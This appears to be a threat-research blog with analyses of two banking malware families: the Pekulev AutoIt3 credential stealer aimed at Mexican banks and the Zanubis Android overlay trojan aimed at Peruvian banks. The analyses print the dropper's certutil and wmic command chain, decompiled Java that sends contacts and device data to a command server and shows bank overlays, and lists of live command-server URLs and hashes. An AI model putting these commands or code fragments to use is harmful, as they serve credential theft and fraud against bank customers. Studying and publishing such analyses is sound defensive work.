Tuesday, September 6, 2022

Pekulev MX AutoIt3 Malware

 Came across this familia via this tweet.

This malware uses a single .rar file downloaded from a remote resource and is geofenced to MX IP addresses and contains within a .CMD file with the payload inside it. In essence it targets Outlook stored passwords in registry and chrome databases. 


Once the .cmd file runs, it calls the following commands in sequence:

  • more +5 C:\Users\user\Desktop\FichaReembolso.cmd

  • certutil -decode -f ~~ "C:\Users\user\AppData\Roaming\jkjlhkj\exe\v3.3.14.5_20180315\RINDI%xxxxx%.exe

  • cmdline: certutil -decode -f C:\Users\user\Desktop\FichaReembolso.cmd "C:\Users\user\AppData\Roaming\jkjlhkj\a3x\X2NI\FichaReembolso.a3x"

  • wmic process call create '"C:\Users\user\AppData\Roaming\jkjlhkj\exe\v3.3.14.5_20180315\RINDI%xxxxx%.exe

It uses the more cmd to check that the file does indeed exist and then proceeds to decode the payload contained within the CMD line file. This payload contains an autoit binary as well as a compiled autoit3 script to execute the payload. The following structure is created:

The folder A3X/X2NI contains the compiled autoit script which once decompiled allows us to continue extracting data. The decompiled autoit3 script contains auxiliary functions to download files and checks if all the required files are present. It needs the SQLite3 DLLs to query the browser's database files and check for the history via this query:

In these samples the list of banks targeted are all from MX, as expected from the geofencing restrictions:

  • enlaceapp.santander.com.mx

  • see.sbi.com.mx/invernet2000

  • enlace.santander.com.mx

  • security.online-banking.hsbc.com.mx

  • bbvanetcash

  • scotiaweb.scotiabank.com.mx

  • empresas.bbvanet.com.mx

If any of the URLs is present in the database, then the data is posted to the remote server (OS Language, Keyboard layout, ISADMIN, Architecture) and uses taskkill to kill the chrome.exe process. It uses the user-agent Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

It does not only target chrome but also tries to steal stored outlook POP3/SMTP/IMAP credentials found on the target machine by extracting them from the registry. Auxiliary functions allow the script to decode the stored data and unprotect it by making use of WINAPIs (CryptUnprotectData)

The script makes use of binaries that are already present in the system to gather all the required information, it takes advantage of WMIC to identify the infected OS operative system. Additionally, it has an auxiliary function to check if it is Windows 7:

Only after it has finished its tasks it will prompt a MessageBox containing saying there was an error during the execution and attempts to run a VBS file. I suspect the VBS file is some sort of cleanup file OR the next stage, but I was not able to get it during my analysis. (If you came across it, please let me know)

VT Collection



  • https://documents.drive.dreamixcorporation.com

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=2&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=3&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=4&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=r3&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=6&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=7&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=8&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?b1

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=9&w=Windows%2010

  • https://www.autoitscript.com/autoit3/pkgmgr/sqlite/sqlite3.dll

  • https://documents.drive.dreamixcorporation.com/do/it.php?b1

  • 1b2ed5b0f4b63e24ce9fdfb3d56645e9cd9eab5a

  • af3fa2057b618c31a46633c50150e2c70eeae2e5

  • 3d483a4726a6e959c3b636be154569f20a287834

  • 4ef8c96c5601435494d4b0f6e7068695ab20509d

  • 137a312c8ab7389afb5af0d3980ffb7c6a7dd5e1

  • ab01d12bb8378cb434b148d5187eb43914032402

  • 15f454e11784c54dd289cd97b972888147a1920d

  • bcc74050fc4618eaadee788221c173ff9825b919

  • dd442d63405275ba64c2d6ade804bbefb797b7ea

  • fc62e0658eda805bd8c91c6badb2fc3e30726250

Thursday, September 1, 2022

Zanubis LATAM Banking Trojan

 Brief note: I analyzed this sample I found thanks to MHT's tweet https://twitter.com/malwrhunterteam/status/1564972377452298245?s=20&t=hqLnACKdbcCOPLjLrNMfyw

07/09/2022 update at the end.

This is the first time I see this sample, not sure if there is more documentation about it (if there is, please let me know). I am going to refer to this sample as Zanubis from now on, the reasoning behind this is the decryption key being Zanubis in the sample I analyzed. At the end, IOCs, SHA256 and targeted banks can be found.

At the time of this writing, the samples were not packed and still contained logging from the authors. These samples are likely still not final versions.

The trojan

This is an overlay-based banking trojan abusing accessibility, the infection method the standard one and it stores a list of applications in shared_preferences. It is focused on targeting LATAM banks and in this sample it focuses on Peru banks. 

On startup, the ServerPrimerosPasos() method is called and retrieves the following information:

  • List of contacts of the device

  • List of installed applications

  • Device data which includes:

    • manufacturer

    • model

    • fingerprint

  • It checks for the brand of the device and checks specifically for Motorola, Samsung and Huawei devices.

  • Ignore battery optimizations.

This information is formatted and sent to the remote server via websockets:

    public void ServerPrimerosPasos() {

        try {

            String contactos = this.funciones.ObtenerContactos();

            String apps = this.funciones.ObtenerApps();

            String datosTelefono = this.dispositivo.ObtenerDatos();

            String cont_res = "{ " + this.funciones.ObtenerIdCliente() + ", \"contactos\" : " + contactos + ", \"apps\" : " + apps + ", \"device_info\" : " + datosTelefono + " }";

            this.socket.emit("datos_iniciales_cliente", str_encript(cont_res, this.config.KEY_STR));

        } catch (Exception e) {



Websocket communications

Once the sample is installed in the victims device, it uses the hardcoded initial URL to post data to a remote server. After the first post, the next ones will receive encrypted strings from both the trojan and the server:

Initial data sent (on install)

Response received (on install)

Device configuration

Device packages

The vistas package contains all the code related to Views and WebViews, including tests and customized views to request the SMS, Battery and accessibility permissions. The authors have left some logging comments in the sample. Likely to debug their code:

Log.e("vista alerta", "en teoria se esta creando la ventana");

Information is posted to the remote server via the NotificarPost method:

    public void NotificarPost(String contenido) {

        FnApiCon apiCon = new FnApiCon(new FnApiCon.AsyncResponse() { // from class: com.personal.pdf.funciones.Funciones.1

            @Override // com.personal.pdf.funciones.FnApiCon.AsyncResponse

            public void processFinish(String output) {



        apiCon.prepararConsulta("d=" + contenido, this.context);

        apiCon.execute(new String[0]);



The class called Configuracion stores the default configuration of the sample. The most important information that is stored here for us is:

  • KEY_STR: Used to encrypt messages as seen in the ServerPrimerosPasos() screenshots

  • URL_INICIAL: Is the startup URL that is used on onCreate within a  WebView and enables Javascript content


  • SOCKET_SERVER: Remote address to open a WebSocket. This websocket exposes the following commands:

    • config_packages: Returns the list of installed packages in the system

    • desinstalar_app and eliminar_app: Deletes the target application

    • bloquear_telefono: Locks the screen

    • notificacion: Sends a push notification to the user. The message is received from the socket and decrypted

    • enviar_sms: Sends an SMS

    • permiso_contacto: Requests the contacts permiso

    • permiso_sms: Get SMS permission

    • rev_permiso_sms: Reset SMS permission

    • unlock_package: Allow the target package to be uninstalled

Next are some code snippets related to the previous commands:

this.socket.on("notificacion", new Emitter.Listener() { // from class: com.personal.pdf.funciones.SocketCon.8

                    @Override // io.socket.emitter.Emitter.Listener

                    public void call(Object... args) {

                        String desencriptado = SocketCon.this.str_decrypt(args[0].toString(), SocketCon.this.config.KEY_STR);

                        String titulo = "";

                        String mensaje = "";

                        try {

                            JSONObject json = new JSONObject(desencriptado);

                            if (!json.isNull("titulo") && !json.getString("titulo").equals("")) {

                                titulo = json.getString("titulo");


                            if (!json.isNull("mensaje") && !json.getString("mensaje").equals("")) {

                                mensaje = json.getString("mensaje");


                        } catch (Exception e2) {


                        Intent dialogIntent = new Intent(SocketCon.this.context, vista_popup.class);





                        dialogIntent.putExtra("titulo", titulo);

                        dialogIntent.putExtra("mensaje", mensaje);



    public void ServerPrimerosPasos() {

        try {

            String contactos = this.funciones.ObtenerContactos();

            String apps = this.funciones.ObtenerApps();

            String datosTelefono = this.dispositivo.ObtenerDatos();

            String cont_res = "{ " + this.funciones.ObtenerIdCliente() + ", \"contactos\" : " + contactos + ", \"apps\" : " + apps + ", \"device_info\" : " + datosTelefono + " }";

            this.socket.emit("datos_iniciales_cliente", str_encript(cont_res, this.config.KEY_STR));

        } catch (Exception e) {



Socket socket3 = IO.socket(String.valueOf(Uri.parse("http://" + this.preference.getServerApp() + ":" + this.config.SOCKET_PUERTO)));

                this.socket = socket3;

                try {


                } catch (Exception e) {

                    Socket socket4 = this.socket;

                    if (socket4 != null) {



                        this.socket = null;


                    this.conectado = false;


Data Encryption

To encrypt and decrypt data it has implemented a class named Cripto where all the methods for both encryption/decryption of strings are stored.


The overlays work by checking the list of packages to monitor from pref_config_package and then it will check it whenever an application opens:


            if (!this.preference.getTargetPackage().equals("")) {

                String[] targets = this.preference.getTargetPackage().split(this.config.SPLIT_PREFERENCE);

                String[] noTargets = this.preference.getNoTargetPackage().split(this.config.SPLIT_PREFERENCE);

                this.rutas = this.preference.getTargetUrl().split(this.config.SPLIT_PREFERENCE);

                for (int i = 0; i < targets.length; i++) {

                    try {

                        if (nodeInfo.getPackageName().toString().equals(targets[i])) {

                            boolean encontro = false;

                            for (String item : noTargets) {

                                if (item.equals(targets[i])) {

                                    encontro = true;



                            if (!encontro) {

                                z = true;

                            } else {

                                z = false;


                            if (z & (!this.rutas[i].equals(""))) {

                                mostrarActivityNavegador(this.rutas[i], targets[i]);



                    } catch (Exception e12) {



If the application is in the list of targets then a WebView will be overlayed on the victims device.

VT Collection



  • 0198b8fa11bf9e8442defa00befa2ab224ada5ebb4a60256f2bf5fc491cca0a1

  • 33adbff1a79da4a3fde49cececac5a6b99bf217be0c6db6cdf85a46bf2087e57

  • 95242e1d105de9c33b2c9d8a9514f58327ca32d7d24af9af19ff3f0d075ea451

  • http[:]//[:]8000/socket.io/?EIO=4&transport=polling&sid=aqOxTFmMn8gXqrvMAAru

  • https[:]//justpaste[.]it/8j6de

  • http[:]//004.fullcircleteam[.]com/014/e08133e07fc400a116ed6ef01cfde577/inicio?c000=mnn

  • https[:]//001.fullcircleteam[.]com/?c000=mnn

  • https[:]//002.fullcircleteam[.]com/?c000=mnn
  • https[:]//003.fullcircleteam[.]com/?c000=mnn

Targeted banks

  • pe.com.interbank.mobilebanking

  • pe.com.scotiabank.blpm.android.client

  • pe.com.bn.app.bancodelanacion

  • com.mibanco.bancamovil

  • pe.com.banBifBanking.icBanking.androidUI

  • com.bbva.nxt_peru

  • com.bcp.innovacxion.yapeapp

  • per.bf.desa

  • com.pe.cajasullana.cajamovil

  • com.bcp.bank.bcp

  • pe.pichincha.bm

  • com.cajahuancayo.cajahuancayo.appcajahuancayo

  • pe.cajapiura.bancamovil

  • com.cmacica.prd

  • pe.interbank.bie

  • pe.com.scotiabank.businessbanking

  • com.bcp.bank.tlc

  • com.alfinbanco.appclientes

  • pe.com.bancomercio.mobilebanking

  • com.bm_gnb_pe

  • com.whatsapp

  • com.ripley.banco.peru

  • com.zoluxiones.officebanking

  • com.cmac.cajamovilaqp

  • pe.com.cajametropolitana.homebankingcml.cmlhomebanking

  • com.pe.cajacusco.movil

  • com.caja.myapplication

  • com.cajamaynas.cajamaynas

  • com.cajatacna.droid

  • com.appcajatrujillo

  • pe.com.tarjetacencosud.canales.mitarjetacencosud

  • pe.com.cajacentro

  • pe.com.prymera.digital.app

  • pe.com.compartamos.bancamovil

  • pe.confianza.bancamovil

  • id=com.credinkamovil.pe

  • pe.com.scotiabank.blpm.android.client.csf

  • com.efectivadigital.appclientes

  • pe.solera.tarjetaoh

  • com.qapaq.banking

  • com.google.android.gm

07/09/02 update


  • 9da516e0a2d17efe8646c1e93450cb80beafabbeb362f992ce6de0a0365da142
  • d03deb4f97ee45ec9651dc5d54db8ca523dc4307521cae3f88b966fa9bc29096
  • 9b512b9809b72b11d7bca5712517d34d6b3c4009f5518af31e5094671ec737b5

New samples popped up showing modified strings on the commands. The unlock_package command is now called desbloquear_paquete, translated into Spanish.

Also updates to the socket code, the SMS functions have new code added:

Also, a new setting is present: 

13/09/22 update

SHA256: 8b36ba2150047191c388ec2f12a7c28cd82b7eccb9b626e8a8620faefee0c9bf
  • http://christopherwilhelm.com/2/assets/css/animate.min.css
  • http://christopherwilhelm.com/2/imagenes/motorola/motorola_r_1.png
  • http://christopherwilhelm.com/2/imagenes/motorola/motorola_r_2.png
  • http://christopherwilhelm.com/2/imagenes/motorola/motorola_r_3.png
  • http://christopherwilhelm.com/2/index.php?q=001?q=004&id=d042ef59b121e01e
  • http://christopherwilhelm.com/favicon.ico

Some changes to the code, more additions but what is interesting is the fact they are obfuscating their APKs to slow down analysis:

Pekulev MX AutoIt3 Malware

  Came across this familia via this twee t. This malware uses a single .rar file downloaded from a remote resource and is geofenced to MX IP...